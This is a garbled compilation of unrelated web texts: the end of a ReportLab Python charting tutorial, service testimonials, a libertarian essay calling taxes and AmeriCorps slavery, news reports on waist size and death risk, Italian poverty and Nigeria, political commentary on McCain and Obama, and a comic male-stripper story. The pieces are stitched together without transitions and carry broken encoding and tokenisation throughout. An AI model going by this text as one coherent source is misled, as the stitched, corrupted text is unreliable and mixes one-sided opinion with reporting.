Enjoy ! " " " ) code_source = pre ( " " " def header ( txt , style=HeaderStyle , klass =Paragraph , sep=0.3 ) : s = Spacer ( 0.2 * inch , sep*inch ) para = klass ( txt , style ) sect = [ s , para ] result = KeepTogether ( sect ) return result def p( txt ) : return header ( txt , style =ParaStyle , sep=0.1 ) def pre(txt ) : s = Spacer ( 0.1*inch , 0.1 * inch ) p = Preformatted ( txt , PreStyle ) precomps = [ s , p ] result = KeepTogether ( precomps ) return result def go ( ) : doc = SimpleDocTemplate ( ' gfe.pdf ' ) doc.build ( Elements ) " " " ) codesection = [ code_title , code_explain , code_source ] src = KeepTogether ( codesection ) Elements.append( src ) hourly_title = header ( " Hits logged , per hour " ) hourly _explain = p ( " " " This shows aggregate hits across a 24 - hour period . " " " ) conn = connect ( ) cur = getcursor ( conn ) te_hourly = totalevents_hourly ( cur ) catnames = [ ] data = [ ] values = [ ] for row in te_hourly : catnames.append(str( row[0 ] ) ) values.append(row [ 1 ] ) data.append( values ) hourly_chart = graphout ( catnames , data ) hourly_section = [ hourly_title , hourly _explain, hourly_chart ] Elements.extend(hourly_section ) go ( )
So , I ’ve muddied things up a bit .
If you ’ve written database code before , you can just look past it all .
I do n’t do anything magical there .
In fact , the chart creation is n’t magical either .
I ’m sure there ’s even a cleaner way to do it – but this works for the moment .
I get a connection object , use it to get a cursor , then pass the cursor to the query function , which passes back ….
a query object : te_hourly .
The chart I ’m going to create needs ‘ category ’ names for the y - axis values , and then values to plot on the chart .
In my case , the hour is row [ 0 ] and the total hits for that hour are in row [ 1 ] .
I build my catnames and data lists , and then create “ hourly_chart ” by passing my lists to the graphout function .
Finally , I add the chart , along with its title and explanation to the Elements list .
Done !
For its part , the graphout function is mostly just a bunch of parameters I need to configure my HorizontalLineChart object .
Once the chart is all set to go , I need to add it onto my Drawing object , and return the Drawing flowable object .
Not yet what I ’d call “ Beautiful Code ” , but it works , and it ’s likely to help some other folks wade through the ‘ getting started ’ hump with ReportLab .
Hope it was useful .
Prominere is so good and they have done a fantastic job ,
They listened to our needs well and they waited until the approval process went through !
highly recommended !
Manny G United States of America
Verry Professionnal job , I need to work with them again verry soon with my new project Ami M England , United Kingdom
Very delightful overall - experience and well - managed team , their support is top - notch and they integrate your needs to your project with keen & swiftness .
Truly marvelous results for a fair price .
Youssef B. Kuwait
i'm very much happy with their work and recommend these guys have a lot of experiences and have done very great job , i will work with you guys , thank you Steve B. Australia
DIGG THIS
In my experience , most people seem to enjoy freedom .
And yet it would appear most people fall prey to any government euphemism for slavery .
Many even vote for slavery , albeit under a different name .
This includes under the name of u201 Cservice .
u201D
Performing service unto others is typically known to be a good , even a noble , act .
Private companies and citizens do it every day , voluntarily .
State - forced u201 Cservice , u201D on the other hand , is merely slavery , or involuntary servitude .
Slavery is essentially Person A forcing Person B to perform a task at Person A's request , and paying Person B at a wage less than what they would have accepted willingly .
Steven Yates provides a helpful definition of slavery :
. . . slavery is non-ownership of one 's Person and Labor .
It is involuntary servitude .
A slave must work under a whip , real or figurative , wielded by other persons , his owners , with no say in how ( or even if ) his labors are compensated .
His is a one - way contract he can not opt out of .
A slave is tied to his master ( and to the land where he labors ) .
He can not simply quit if he does n't like it .
Moreover , a slave can be bought and sold like any other commodity .
While most people think slavery was abolished in the US in 1865 , it is alive and well — except now slavery is institutionalized and disguised under the more innocuous , and less conspicuous , label u201Ctaxes.u201D
It is not hard to see that taxes are a form of slavery — it is taking the fruits of one 's labor through a figurative whip ; it is also a violation of the 13th Amendment .
However , let us turn from taxes to a more explicit form of involuntary servitude , this time u201 Cserved upu201D by future President Barack Obama .
Slavery will grow under Obama 's Presidency .
Obama plans to u201 Cexpand and fund AmeriCorps from 75,000 slots today to 250,000u201D through the creation of five new Corps .
Let 's take a look at the description of Obama 's proposed program , the Classroom Corps , taking particular note of the language :
Classroom Corps : to help teachers and students , with a priority placed on high - need and underserved schools .
The Corps will enlist retired or mid-career engineers and scientists to provide support for math and science teachers in the form of mentoring , student tutoring , curriculum development , and technology support .
It will recruit neighborhood civic , business and faith leaders to offer after - school programs and community service opportunities .
And the Corps will draft parents , grandparents , college students or community members to mentor and provide one - on - one assistance to students , and assist with classroom activities under the direction of teachers .
( Emphasis added . )
Using such words as u201 Cenlistu201D and u201 Cdraftu201D are surely not the most marketable terms for implementing and expanding a program which includes the word u201CCorpsu201D — but at least the involuntary servitude is less disguised through these verbs .
Perhaps people will not be as receptive to this thinly - veiled form of slavery .
The AmeriCorps program is part of the government 's u201CCorporation for National & Community Service.u201D
The program is publicized as a service and volunteer u201CCorporation .
u201D
Yet there are very few volunteer programs that require almost a billion dollars a year of US taxpayers ' money to function .
In fact , u201 Cvolunteersu201D for these programs receive payment .
Receiving payment through tax dollars ( i.e. , theft ) , calling it volunteer work , and touting it as a u201Cserviceu201D program would make Orwell proud .
This is not the end of Obama 's involuntary servitude program .
While the Classroom Corps will enlist the college student , middle - aged , and grandparent , there is another u201 Cserviceu201D possibility for those feeling left out : the middle and high school students .
Here is a description of the program :
Expand Service - Learning in Our Nation 's Schools :
In November , Barack Obama laid out a comprehensive plan to provide all Americans with a world - class education and give our schools a substantial infusion of funds to support teachers and principals and improve student learning .
That plan conditions that assistance on school districts developing programs to engage students in service opportunities .
Obama believes that middle and high school students should be expected to engage in community service for 50 hours annually during the school year or summer months .
( Emphasis added . )
This program would more accurately be termed child slave labour .
Obama believes that service should be held as a value at the expense of everyone else 's liberty .
Clearly , the state 's doctrine is obedience to the state , uniformity in all things , and collectivism .
Thus we see the danger of the state being in control of the education system .
In fact , this comes closer to the central issue .
The correct question , as Murray Rothbard pointed out , is whether the parent or the state should be the overseer of the child .
Do parents have a right to raise their child or does the state ?
Libertarians must answer that parents , as u201 Cproducersu201D of the child , have the right to raise their children .
In addition , parents who engage in true , i.e. , voluntary , service with their children are able to benefit as a family .
Parents can teach their children what it means to serve , how to serve , when to serve , and whom to serve .
The state , as a form of institutionalized coercion , is hardly an example of serving others .
When a child learns that service is something required , as opposed to something voluntary , it no longer becomes a charitable or kind act .
It appears that most of these u201 Cserviceu201D activities will take place outside of normal school hours , thus decreasing the time a child spends with their family .
We now see the state is at war , not only with every individual , but with the family .
William Lloyd Garrison showed the importance of abolishing slavery in the 1830s :
Urge immediate abolition as earnestly as we may , it will , alas !
be gradual abolition in the end .
We have never said that slavery would be overthrown by a single blow ; that it ought to be , we shall always contend .
It appears that slavery in the 21st century is alive and well , and will grow under a new Slave Master .
In echoing Garrison 's sentiments , libertarians must contend that slavery be abolished immediately , and under any mask it may appear .
Involuntary servitude acclaimed as service needs to be exposed .
Fortunately , there is one sensible voice among bureaucratic babble , Ron Paul , who has proclaimed liberty from Slave Headquarters itself for years ( taken from 2003 ) :
Military needs aside , however , some politicians simply love the thought of mandatory service to the state .
To them , the American government is America .
Patriotism means working for the benefit of the state .
On a crude level , the draft appeals to patriotic fervor .
This is why the idea of compulsory national service , whether in the form of military conscription or make - work programs like AmeriCorps , still sells on Capitol Hill .
Conscription is wrongly associated with patriotism , when it really represents collectivism and involuntary servitude .
November 22 , 2008
The Best of Chris Brown
A bulging waistline can almost double the risk of dying early , even for people who are not overweight , doctors have found .
The finding emphasises that weight alone is not a good guide to health , and that storing excess fat around the midriff can have a serious impact on lifespan .
A study of more than 350,000 Europeans showed that women with 39.4in ( 100 cm ) waists were almost twice as likely to die prematurely as those with 25.6 in ( 65 cm ) waists .
In men , the same higher death rate was linked with a waistline of 47.2in ( 120 cm ) , compared with those who measured 31.5 in ( 80 cm ) .
Researchers explain in the New England Journal of Medicine that excess fat around the midriff may increase the risk of serious conditions , such as cancer and heart disease , by releasing hormones and compounds that help them to develop .
Doctors at Imperial College London and the German Institute of Human Nutrition examined the body mass index ( BMI ) and waist to hip ratios of 359,387 people , more than 14,000 of whom died during the 10 - year study .
They found that for every 5 cm increase in waist measurement , the risk of premature death rose by 17 % in men and 13 % in women .
Those with a large BMI tended to die of heart disease and cancer , while respiratory diseases were more common among skinnier people .
Those with the lowest risk of early death were men with a BMI of 25.3 and women with a BMI of 24.3 .
" The most important result is the finding that not just being overweight , but also the distribution of body fat , affects the risk of premature death of each individual , " said Elio Riboli , who led the study .
June Davison , a cardiac nurse at the British Heart Foundation , said : " The risk of developing heart disease is higher when fat is concentrated around the waist area .
If you tend to gather weight around your middle , increasing the amount of activity you do and watching what you eat will help to reduce your risk of heart disease and of dying early . "
At one of his town hall events , a woman in the audience said “ I ’ve heard that Senator Obama is an Arab . ”
To his credit , McCain cut the woman off and said “ No , maam .
He ’s a decent family man and citizen that I just happen to have disagreements with on fundamental issues . ”
My opinion of McCain went way up in that moment .
You can see the video here .
Likewise , at a similar event a man told McCain he ’s “ scared ” of an Obama presidency and who he ’d select for the Supreme Court .
Again , McCain responded “ I have to tell you .
Senator Obama is decent person and a person you do n’t have to be scared of as president of the United States . ”
Unfortunately , at the second event McCain ’s audience booed him .
Sad , that .
UPDATE : The other sad thing in this case is the mainstream media :
UPDATE 2 : William F. Buckley ’s son Christopher has a good summation of McCain ’s situation : “ If he goes out losing ugly , it will be beyond tragic . ”
UPDATE 3 : Obama thanks McCain for helping to tone down the rhetoric .
“ I appreciated his reminder that we can disagree while still being respectful of each other . ”
MILAN ( Reuters ) -
An empty plastic bag in hand , Italian shop assistant Stefano G. stands in line with hundreds of others waiting to collect handouts of basic foods he says he can no longer afford .
Free meals are served in a " soup kitchen " run by the Sant ' Egidio Christian community in Rome September 17 , 2008 .
REUTERS / Tony Gentile
For the last seven months , the 43 - year - old , who supports his pensioner parents and declined to give his full name because he did not want to be recognized , has been coming to the Pane Quotidiano ( Daily Bread ) charity in Milan to take home free bread , milk , fruit and vegetables and other produce .
Charities in Italy -- where according to the World Bank Gross National Income was $ 33,540 ( 20,740 pounds ) per head in 2007 -- say a rising number of people of working or pensionable age are seeking their help .
Known as “ the new poor ” to some , the first - timers line up to collect food or eat at soup kitchens , where charities say they still represent a minority compared with immigrants .
Italy was already on the brink of recession before double - digit price rises for staple foods and the latest spasms of the financial crisis .
Stefano said he earns “ a few hundred euros ” a month .
“ Things are getting worse and worse , it ’s a crisis .
With prices rising , what can I do but this ?
I ca n’t steal , ” he said .
“ Every little helps . ”
Exactly how many people are joining the food queues is hard to say , but humanitarian groups say the trend is spreading as a slowdown and high prices push many on low incomes or without jobs into hardship .
“ This is something that cannot be ignored and will probably rise further , ” said Marina Nava , of Milan charitable center Opera San Francesco , which offers free meals .
“ These are people who have a home and up until a little while ago lived above the poverty threshold .
But with things changing ( they ) quickly fall below , ” said Nava .
Officially 6.8 percent of Italians are unemployed : Roman Catholic charity Caritas says 13 percent of Italy ’s 58 million people are considered poor , living on less than 500 - 600 euros a month , or less than half the average salary .
In a report , it also highlighted the “ nearly poor , ” those just above the poverty threshold by a marginal 10 - 50 euros a month .
SUDDEN JUMP
“ Among first - timers , a third are Italians , ” said Mario Marazziti of Rome ’s San Egidio church soup kitchen .
“ Slowly , the percentage of Italians ( at San Egidio ) is increasing . ”
The euro zone ’s third - largest economy has been one of its most sluggish performers for years , suffering more than most from high oil prices , a strong euro and the global slowdown .
Statistics show Italy is growing older and poorer while the economy underperforms its European peers .
Inflation is above the euro zone average , with shoppers still pinched by price hikes which producers say are unavoidable due to higher recent commodity and fuel prices .
Pasta cost almost 25 percent more in September than a year ago and the price has not come back down , while bread was up 8.6 percent .
Last month , consumer groups staged a “ bread strike , ” trying to persuade Italians not to buy bread for a day in protest .
The government has so far said it will stand as guarantor of last resort for bank deposits up to 103,000 euros , but has not taken specific steps to ease the strain on those on low incomes .
Prime Minister Silvio Berlusconi said on Monday Italy would “ not take advantage ” of market turmoil to dilute its long - term debt - reduction goals .
Francesco Marsico of Caritas said costly food and fuel put people at risk of sinking below the poverty line : “ It does n’t take much for income not to be sufficient anymore .
These families have trouble reaching the end of the month . ”
Banco Alimentare ( “ Food Bank ” ) , which redistributes food to charities feeding the poor , says the number of Italians seeking help had been rising in the last two years but jumped lately .
“ The river has been rising and rising , and this year it burst its banks , ” said Marco Lucchini , director - general of Banco Alimentare .
SAVING MONEY
At Pane Quotidiano , which gives out the equivalent of 2,500 calories of food each to some 2,000 people a day , groups of all ages wait in line as volunteers distribute bread , packs of tiramisu , risotto , peaches and milk .
“ In the last year , we ’ve had an increase of over 30 percent in the number of visitors a day , ” said Ercole Polline , a counselor there .
“ About a year and a half ago , there were about 80 Italians who came every day , now there are about 350 . ”
Maria Piacere , aged 62 , is retired and lives on about 800 euros a month .
She has been coming for food for a year .
“ I have gas and electricity to pay , rent and fuel for the car , ” she said .
“ That leaves only a little for the rest . ”
Among the crowd , a neatly dressed 28 - year - old student waited for her turn to collect some food .
“ I do not come here voluntarily but I have no choice , ” she said , also declining to be named .
“ I never imagined I would have to come here but I manage to save some money , say a few euros . ”
Editor 's note : Campbell Brown anchors CNN's " Campbell Brown : No Bias , No Bull " at 8 p.m. ET Mondays through Fridays .
She delivered this commentary during the " Cutting through the Bull " segment of Monday night 's broadcast .
CNN 's Campbell Brown it 's true that lobbyists often are well informed on how Washington works .
( CNN ) -- I want you to hear something President - elect Barack Obama said just about a year ago :
" I am running to tell the lobbyists in Washington that their days of setting the agenda are over .
They have not funded my campaign .
They wo n't work in my White House . "
Just this weekend The New York times published a list of names -- a rather long list of names of people -- who are working on Obama 's transition team or who have accepted jobs in his White House who are either former lobbyists or who have close ties to lobbyists .
The Times reports that some of those people were lobbying as recently as this year .
Watch Campbell Brown 's commentary »
' No bias , no bull '
Get the latest on the day 's main events on " Campbell Brown : No Bias , No Bull "
8 ET Monday through Friday on CNN see full schedule »
Now , the Obama team is quick to point out that their rules and restrictions on lobbying ties are far stricter than any previous administration .
And the Obama folks concede that eliminating anyone in Washington who had ever lobbied Congress or who has a family member who lobbied Congress would be foolish .
And it 's true , you could argue the reality of Washington and our government is that lobbyists are often the most informed people on a given issue .
But we certainly never heard Obama articulate it quite that way when he was candidate Obama .
What he said then was :
" That 's what happens when lobbyists set the agenda and that 's why they wo n't drown out your voices anymore when I am president of the United States of America . "
And that is a promise that he may already be struggling to keep .
The opinions expressed in this commentary are solely those of Campbell Brown .
All About Barack Obama • Political Lobbyists
The current economic collapse is a difficult story for TV .
It 's a peculiar period in between an election and an inauguration .
This most important story , this great - or - not - so great depression , is also the hardest for CNN to tell .
I have more than enough reasons why in this late - night rant .
1 ) It 's not a hurricane so Anderson Cooper of CNN is unable to position himself in the middle of the storm for optimal drama .
In other words , TV anchors can't get wet and windblown , while viewers worry about their safety .
The state of the economy is a disaster but not a natural disaster .
Nobody 's leaving the studio for this one .
There 's no place to go .
2 ) It 's like a war and we keep losing ground each day .
In the place of casualties , we have falling stock indices but it's hard to show the real damage .
There 's only so much you can do with oversized charts to tell a story .
The war on terrorism featured a real enemy .
We 've just never been able to find them , no matter who goes after them .
( Maybe it 's not so different . )
Campbell Brown ( " No Bull , No Bias " ) should say that what the capitalism 's finest did to themselves and to us was worse than any terrorist could have imagined .
3 ) Few CEOs , fewer economists , and almost no one in the financial industry , want to step forward and say with conviction what will happen .
A year ago we could n't get them to stop telling us what great things to expect in the next quarter .
Not now .
They do n't know what 's coming and they are n't willing to say even that much .
They are MIA .
Insider information is at an all - time low .
Memo to all American CEOs : do n't presume in ten years ' time to write business books about your leadership skills ; maybe there 's a gripping survival story to be told about how you held on to your job .
We want them to face the music .
Even the Watergate hearings , which had a large cast of characters , were compelling to watch day after day .
4 ) There is not a President at the center .
Bush is just not there .
Like us , he 's watching TV to find out what to think .
Reporting from the White House does n't have any relevance today .
Moreover , the satisfaction in blaming Bush for everything is diminishing .
In addition , with the election over , reporters can't simply ask the candidates to react to the day 's bad news .
It seldom produced much insight anyway but it filled time .
Now Obama is filling time , and he keeps repeating that " there 's only one President " but there 's really not a President .
There 's a leadership vacuum waiting to be filled by Obama .
( BTW , this story is much bigger and more important than Obama 's election and I think he understands that . )
Bottom line is we 're waiting for a central figure to emerge .
5 ) Real experts are hard to find , especially ones with big hair .
So over - present talking heads such as Suze Orman ramble on and on in front of Larry King and others .
Here 's an incredible ramble from Suze Orman on CNN :
People feel they need medication because they are panicking .
It 's as if the economy right now is in the I.C.U. unit of a hospital .
We are in intensive care and they are throwing everything type of medication at us to cure what is going on .
They are panicking because why ?
Nothing is working .
They tried this , it did n't work .
They tried that medication , it did n't work .
They are running out of prescriptions to give it .
We are going to be in the I.C.U. unit for a while .
Eventually , I do n't know when that will be , six months , a year , year and a half , we will get out , we 'll be in the hospital then .
We 'll stay in the hospital for about a year or two .
After another year or two we will end up in rehab and then we 'll be okay .
This is a long stretch .
People have to stop panicking .
CNN link
Makes me think of Amy Winehouse singing " They try to make me go to rehab , I say no , no , no . "
Rehab is taking place over on CNBC .
6 ) Where are the winning and losing teams ?
We have learned more about Al Queda cells and Saddam Hussein 's Elite Guards than about the people in power behind CITI , Goldman Sachs , Lehmann Brothers , AIG , etc .
We know more about the New York Jets than we do about CITI Bank .
Are the slow - moving Detroit Manufacturers competing head - to - head against the fast - talking Wall Street Financiers ?
Please tell us more about these teams as we 're entrusting them with such large amounts of public money .
Maybe we need to start thinking that , as with football , we care because we 're betting on teams to win .
We have our money at stake .
7 ) I can almost hear producers wondering each night if there is n't a better story to lead with .
" Is n't there a story we can do on Sarah Palin ?
Like her or hate her , people can't get enough of her . "
At least that appears to be the thinking behind her getting the most air - time in the week following the election .
Would you rather hear about Sarah Palin pardoning a turkey or David Gergen saying no one knows what to make of the economic mess ?
At least , the Palin piece will have something interesting going on in the foreground and the background .
8 ) " Why ca n't this be happening to Russia or China ?
If it was only happening there , and not here , we would know how to cover it . "
CNN would send Christiane Amanpour there .
" Live from … " .
We do n't have visuals like people knocking down walls , rushing into the streets or standing in lines .
The Fall of the Berlin Wall is the Fall of Communism , the fall of Saddam 's statue — now these are stories of new freedoms .
In America today , we have a big fall without a distinctive symbol , without a video loop , without an exotic locale .
Also , how do you explain that China is providing the bail for the bailout ?
As David Gergen said tonight on CNN , " China 's become our banker . "
Even harder to tell that kind of " freedom " story .
9 ) The problems are n't going away and there 's no timeline .
So , where 's the equivalent of " America Held Hostage : Day XN " ?
Nightline evolved from a special report to become a nightly hard - news program to follow the ongoing story of Iran holding American hostages during the Carter Administration .
Why is n't this economic story played front - and - center in the same way ?
Is n't there a TV journalist saying " Holy Christ , this is the biggest story of my career and I 'm going to bring it to you every night " ?
Ted Koppel , Edward R. Murrow , where are you ?
Here 's my list of names for a new Nightline - like special series on the economy :
America 's Panic Attack
America 's Panic Attack
The Joke 's on US
The Joke 's on US
Invisible Hand - Wringing
Invisible Hand - Wringing
Capitalism on the Ledge
Capitalism on the Ledge
The Economy on the Couch
The Economy on the Couch
Future Shock & Awe
Future Shock & Awe
Hitting the Wall And Falling on the Street .
Hitting the Wall And Falling on the Street .
America Sucks Right Now
America Sucks Right Now
US : Out of Order
10 ) Lastly , the TV media is no better off than we are at understanding this complex crisis .
On a gut level , viewers know what the story is , that it 's about them , their future and their children 's future .
They have specific questions that are difficult to answer ( see the Suze Orman blog on CNN where it is promised that she 'll answer these many , many questions ; she does n't , of course . ) and they have general worries ( should I panic ? ) that are hard to resolve .
While we try to absorb as much information as possible , we keep having the same conversation over and over :
Q. What 's going on ?
A. I do n't know .
It 's hard to tell .
Gordon Brown is being accused of preparing for a military adventure in Africa after he pledged to provide backing to the Nigerian security forces .
His announcement prompted the collapse of a ceasefire in the oil - rich Niger Delta and helped to drive up crude oil prices on world markets .
The Prime Minister 's offer to help " tackle lawlessness " in the world 's eighth largest oil producer was immediately condemned by the main militant group in the Delta , which abandoned a two - week - old ceasefire and accused Britain of backing what it calls Nigeria 's " illegal government " .
The group issued a " stern warning " to Mr Brown in an emailed statement : " Should Gordon Brown make good his threat to support this criminality for the sake of oil , UK citizens and interests in Nigeria will suffer the consequences . "
Speaking at the close on Wednesday of the meeting in Japan of the Group of Eight leading industrial nations , Mr Brown said that the UK was ready to offer the Nigerian military direct assistance to help return law and order to the southern region and to restore oil output .
Download the new Independent Premium app Sharing the full story , not just the headlines
The Prime Minister said : " We stand ready to give help to the Nigerians to deal with lawlessness that exists in this area and to achieve the levels of production that Nigeria is capable of , but because of the law and order problems has not been able to achieve . "
His comments came ahead of a visit to London by the Nigerian President , Umaru Yar 'Adua , next week in which he is expected to appeal for military aid to put down militant groups who have attacked oil pipelines and platforms .
The Nigerian press received the British offer as a declaration of war against rebel groups .
The Daily Champion newspaper ran the headline " Battle Line ! UK to Declare War on Delta Militants " .
Mr Brown is under immense pressure on the domestic front to ease the soaring fuel costs , driven by the global spike in oil prices .
Major unrest in the impoverished Niger Delta region has cut the country 's capacity to pump oil by one - quarter in recent months , helping to drive oil prices to the record high of $ 145 per barrel .
However , Mr Brown 's initiative appeared to catch the Foreign Office unawares .
A spokesman insisted yesterday that there had been " no change in policy " but that " options " were being considered .
Senior military sources also said they had been caught by surprise by the decision to offer military aid .
There are no contingency plans for intervention in Nigeria that can be activated , they said , and any operation would have to be organised from scratch .
President Yar 'Adua came to power a year ago after a controversial election win that was challenged in Nigeria 's High Court and contested by independent observers .
Despite campaign pledges to tackle endemic corruption , which has raised the country to the top of the global graft index and enriched an elite with illegal oil revenues , the President has made little progress .
He has also failed in his pledge to address local grievances in the Delta and restore peace to the region .
A series of attacks on installations and the kidnapping of oil workers by the main militant group , Movement for the Emancipation of the Niger Delta ( Mend ) , has cut Nigerian oil production by one - quarter .
The group is demanding a greater share of oil revenues be given to local people as the Niger Delta is among the poorest regions in Africa , despite the immense oil wealth it produces .
A spokesman for Mend , Jomo Gbomo , told The Independent that the UK offer was tantamount to a return to colonial policies of divide and rule : " They ought to know better than any other country [ not ] to involve themselves in any other area aside from development .
They [ the British ] are getting frustrated and we will continue frustrating the oil - dependent markets until justice is offered . "
Asked if he feared that Nigeria would become the next Iraq or Afghanistan , he replied : " It will not get to that point except if there is foreign interference . "
Mend offered to enter peace talks last year but withdrew after the government launched a secret trial against one of its leaders .
Attempts to convene a summit have been complicated by the withdrawal of the United Nations envoy who was asked to oversee it , as well as the refusal of Mend to take part .
Daily coronavirus briefing
No hype , just the advice and analysis you need Enter your email address Continue Continue Please enter an email address Email address is invalid Fill out this field Email address is invalid Email already exists .
Log in to update your newsletter preferences
Register with your social account or click here to log in I would like to receive morning headlines Monday - Friday plus breaking news alerts by email Update newsletter preferences
Any action in Nigeria would further stretch British forces .
Air Chief Marshal Sir Jock Stirrup , the Chief of Defence Staff , warned the Government last month : " We are not structured or resourced to do two of these things [ Iraq and Afghanistan ] on this scale on an enduring basis , but we have been doing it on an enduring basis for years .
Until we get to the stage when one of them comes down to small - scale , we will be stretched beyond the capability we have . "
Defence sources say the only realistic option would be to send special forces along with specialised hi-tech equipment to combat the guerrilla campaign .
However , two squadrons out of the four in the SAS are currently deployed abroad , in Iraq and Afghanistan , and one is said to be on exercise .
Units of the Special Boat Squadron are also busy in those countries with one contingent working alongside US forces in yet another hunt for Osama bin Laden .
The UK does , however , have special forces in Djibouti alongside other Nato countries in the American - run Horn of Africa task force involved in missions against Islamist militants ; some of them can be switched from east to west Africa .
It may also be possible to station a Royal Navy warship offshore .
Major General Julian Thompson , a former commander of the Royal Marines , said : " It would be utterly extraordinary to propose anything like a sizeable deployment of forces to Nigeria .
Where are they going to come from ?
The MoD has not exactly got a box marked ' new troops ' they can open up for something like this .
" It would be possible to send special forces in limited numbers to help the Nigerian military , but , with the current situation in Afghanistan they cannot be kept there for anything like a prolonged period . "
Britain is one of the largest investors in Nigeria .
About 4,000 Britons live in the west African country , many working for large companies , including the oil and gas companies Royal Dutch Shell and BG Group .
Click here to have your say
by
Let me preface this super long story for those of you that do n’t really like to read .
I was a male stripper for a night .
On a weekend spent at some friends ’ beach house near Myrtle Beach , there came about a turn of events that changed lives forever .
If I may , I ’d like to set the table .
Myrtle Beach , sometimes know as the Redneck Riviera , plays host to piles upon piles of American tourist traps and crap .
I ’m talking about EVERY crap chain eatery ever thought up , including one that slaps me in the brain every time I see it – Fatz .
That ’s the kind of place that Americans are loving more and more .
I mean , if you ca n’t manage to eat sensible , healthy ( ish ) food on a daily basis , the truly American thing to do these days is say “ Fuck it , ” Leaving - Las - Vegas - style , right ?
So anyways , from putt - putt courses worth more than most developing countries , to Dolly Parton ’s fucked - up version of the history of this deplorable country set to a dinner with which you are given no utensils , there are endless ways for poor , working - class families to go broker .
With all that in mind , you know there are more than a couple of places for middle - aged , undersexed greaseballs of all genders to go tuck a few Washingtons in to the “ pants ” of an exotic object of desire .
This aroused my interest and touched my heart right in the empty wallet area .
We all hear of the fruits of labor harvested by those that choose to fuel ( force themselves into ) the imaginations of hungry , horny people who just opted to receive their paychecks in one dollar bills .
In what started as a prank call , and evolved into the professional night of my life , I decided to probe this ever - lucrative industry for opportunity .
It started with a call to a club .
I quickly morphed my personality into that of a destitute biker .
My handle for the evening would be “ Thunder . ”
I mean , I stand a formidable five feet ten ( in my shoes ) , and pack about 145 pounds of ripped , seething , sexy muscle .
So what could be more ironic than calling myself Thunder ?
Really , I look like a slightly pumped up version of Screech from Saved by the Bell , but on the phone it ’s another story .
So I told the gal on the phone , “ Hey sweetie .
Y’all need any male talent around there ?
I ’m up here from Alabama , out of money , and my bike ’s out of gas . ”
Graciously , and empathetically , she informed me of the evening ’s schedule .
It ’s The Ladies Night Out Hunk - A - Rama .
Score .
And then I was placed on hold to speak with the manager , Jeff. Double Score .
It seemed that this was shaping up to be a very successful prank call so far .
When Jeff hopped on the line , I fed him my sad , lonely story , and for good measure , briefly described my physical stature : “ Man , I ’m skinny , but ripped , I got a lot of tattoos , and man , I got MOVES . ”
Jeff told me that they were finding themselves a little short on entertainers for the evening , and right there , over the phone , offered me an “ audition . ”
Whoa .
This call went from being just kind of funny to overhear , to hinging on worthless .
I mean what was I to do ?
Just say , “ Fuck yeah !
I totally had that dude !
He thinks I ’m coming in at 9:30 for an audition !!!
Hah ha ha !!! ”
I do n’t think so .
That , friends , would not be the Snakehawk way .
I had to take this to the limit .
In a bit of a frenzy , being as that my big debut was in approximately 2 hours , I had some things to do in order to prepare .
The first , and not necessarily a checklist item , was to grab the closest drink and get it down the hatch .
I was already nervous .
Allison , my ever - supportive girlfriend , and number one fan for life , could not ( but could ) believe this was happening .
Our hosts for the weekend , were not quite sure what was going on , but kept saying things like , “ Wow .
This could be epic .
EPIC . ” As for myself , I was mentally taking inventory of the clothes I ’d brought with me , and it really came down to the clothes I had NOT brought with me :
No tear - away pants , no fireman ’s hat , no banana hammock .
Damn .
Time to get creative .
Thinking to myself , “ I ’m sexy .
I ’m hot to death .
I can bank tonight if I just make sure I ’ve got MOVES . ”
I thought it best to practice a couple of things .
I practiced the worm .
Well , the modified worm - to - floor - hump move .
That was sure to bring dollar bills raining from the spotlights , I figured .
I danced around , nervously , asking myself if I was really gonna do this .
My answer to myself was “ Of course I am . ”
What about an outfit ?
Well , that ’s when I realized and appreciated how much Allison had packed along for this 3 - day weekend .
Jeans ?
Check .
They were quite a bit more “ sexy - fit ” than my 501’s .
What comes next , friends , please realize , was a matter of absolute necessity , and a simultaneous stroke of genius .
G- string ?
Check .
A tarty little turquoise number at that , from Victoria ’s secret .
Now bear in mind that ladies generally do not have the same equipment to conceal , so my business would have to be covered otherwise .
I mean , I could not prance around one bit in these hot little panties , or I ’d find myself prairie dogging out of the side , no doubt .
So , I grabbed my freshest pair of Fruit of the Loom boxer briefs , a black pair that had not been worn for 3 days in a row , and figured I could really tantalize by just pulling them down a little bit , TEASING with the turquoise women ’s panties .
No need to give them all of it , right ?
To round out the outfit , Kristen ( whose folks own the beach house ) loaned me a black Motley Crue wifebeater , and got fast to work on the Swayze Modification of one of my white t’s .
This was starting to look really good , in the worst way possible .
We considered the drive , and armed with a bottled mixed - drink , piled in the car , ready for business time .
While making our way to the club , it seemed the best way to pad my confidence would be to call friends , and inform them of tonight ’s goings - on .
A good friend of mine Charlie was requisite on the short list of folks to call .
Upon telling Charlie of the night ’s planned adventure , I was pleasantly surprised with an overflowing amount of support , in addition to advice .
See , it just so happened that he had tried his hand in this industry as well .
His best advice to me : “ Just remember , the pelvis is your money - maker . ”
Got it .
I ’m ready .
We parked far from eyeshot of the door , so that my cover would n’t be blown .
I ’m a hard - on - his - luck biker , remember ?
No such person would roll up on a potential job with 3 otherwise respectable looking and cute people in a brand - new Volkswagen GTI .
Off I trotted , or probably strutted to the scene of the crime .
I went in the main door where I was greeted by a fairly surly woman of no particular degree of hotness who immediately asked me , “ Sir , do you have a different shirt to wear ? ”
No problem , sugar .
I understand how amazingly sexy I look .
“ I ’m here to see Jeff about some work , ” I quickly informed her .
She directed me back out the main door , to an inconspicuous door at the end of this behemoth strip - plex where I was about to forge the genesis of my new career .
In I walked , where Jeff , who no doubt recognizes raw talent when he sees it , waved me on up to the bar .
As I strode confidently towards him , I calmly surveyed the scene .
To my left , an elevated Saturday - Night - Fever style floor lit stage .
Starkly in the middle of the stage , I took in the French doors from which , I gathered , the talent was to emerge .
There sat in various little clumps far from the stage in every direction , a handful of ladies .
As I approached Jeff , I tried desperately to keep my shit together .
I was quaking in Allison ’s g-string , and really still had NO idea of exactly what I was getting myself into .
Jeff made it easy .
Nice to meet you and all that stuff , and then “ So you ’ve entertained before , right ? ”
“ Yeah , man .
I have . ”
Whoa .
“ So , did you bring any music ?
What kind of gimmicks do you have ? ”
Jeff was getting down to business in a way that suggested to me that this was not an audition .
He then went on , “ Well you ’re in luck tonight , partner .
It ’s kind of post - season around here , so lots of our men have scattered .
We ’ve got 3 other guys tonight , and we could definitely use you . ”
“ Well , alright . ”
My thinly veiled terror was wearing a mosquito net of enthusiasm .
I was advised to just have a drink or two , relax , and wait for some of the other dudes to arrive so they could show me the ropes .
